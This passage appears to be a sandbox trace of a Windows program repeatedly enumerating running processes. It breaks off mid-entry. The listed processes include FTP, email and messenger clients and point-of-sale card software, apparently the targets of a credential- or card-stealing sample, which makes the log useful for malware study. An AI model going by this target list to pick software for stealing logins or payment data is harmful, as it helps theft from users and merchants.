Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0246.416] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0246.417] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0246.448] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0246.451] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0246.453] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0246.454] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0246.455] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0246.457] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0246.458] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0246.460] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0246.461] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0246.463] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0246.464] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0246.471] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0246.473] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0246.476] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0246.478] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0246.479] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0246.517] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0246.519] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0246.521] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0246.523] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0246.524] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0246.526] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0246.571] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0246.574] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0246.579] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0246.581] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0246.582] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0246.584] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0246.586] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0246.587] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0246.589] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0246.594] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0246.596] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0246.597] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0246.599] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0246.600] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0246.602] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0246.604] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0246.605] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0246.661] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0246.663] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0246.665] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0246.667] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0246.671] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0246.673] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0246.675] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0246.676] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0246.678] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0246.679] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0246.681] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0246.682] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0246.684] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0246.688] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0246.690] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0246.692] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0246.693] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.695] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.696] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.698] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.707] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0246.709] CloseHandle (hObject=0x758) returned 1 [0246.710] Sleep (dwMilliseconds=0x64) [0246.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0246.877] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.879] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.881] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.883] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.885] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.892] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.895] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.897] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.898] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.900] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.901] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.955] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.956] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.958] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.959] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.961] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.962] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.964] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.969] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.970] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.972] Process32Next (in: 